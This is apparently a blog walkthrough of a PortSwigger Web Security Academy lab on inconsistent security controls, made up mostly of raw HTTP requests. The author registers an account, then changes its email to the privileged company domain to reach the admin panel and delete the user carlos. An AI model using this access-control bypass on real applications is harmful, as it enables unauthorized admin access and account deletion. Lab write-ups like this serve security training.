Skip to content

chojnowski.it

Port Swigger Inconsistent security controls

Port Swigger Inconsistent security controls

Inconsistent security controls¶

Solution¶

Register a new user¶

POST /register HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=c6eyxidQftaIDP780kVsmVn6Zq8Ba6H9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://0a12005503774316e56517d100f7003a.web-security-academy.net
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/register
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=EDmd3HzPd1XcsnGZEE7QOqXwwK7nhnfW&username=pentester&email=pen%40exploit-0a15004c03e24329e5ee16b401c60027.exploit-server.net&password=qwerty

Open email client¶

https://exploit-0acc00cb0443e1be8333e28d019b0071.exploit-server.net/email
---
GET /register?temp-registration-token=PWwdedHT6fZH9np1RmRt58AVDtrEoNWD HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=c6eyxidQftaIDP780kVsmVn6Zq8Ba6H9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://exploit-0a15004c03e24329e5ee16b401c60027.exploit-server.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

POST /login HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=c6eyxidQftaIDP780kVsmVn6Zq8Ba6H9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: https://0a12005503774316e56517d100f7003a.web-security-academy.net
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=EDmd3HzPd1XcsnGZEE7QOqXwwK7nhnfW&username=pentester&password=qwerty

Change email¶

After changing email I see a new tab called "Admin panel"
---
OLD mail: [email protected]
New mail: [email protected]
---
POST /my-account/change-email HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=G83XNSn52WbUrOzMsSHLrliSD1IvRAHw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: https://0a12005503774316e56517d100f7003a.web-security-academy.net
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/my-account?id=pentester
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

email=pentester%40dontwannacry.com&csrf=i4r8vIcTTdRGBN0lhmzEEXAvzZScC4ZB
---
GET /my-account?id=pentester HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=G83XNSn52WbUrOzMsSHLrliSD1IvRAHw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/my-account?id=pentester
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Delete user: carlos¶

Open website and delete user carlos
https://0a12005503774316e56517d100f7003a.web-security-academy.net/admin
---
GET /admin/delete?username=carlos HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=G83XNSn52WbUrOzMsSHLrliSD1IvRAHw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /admin HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=G83XNSn52WbUrOzMsSHLrliSD1IvRAHw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Solved¶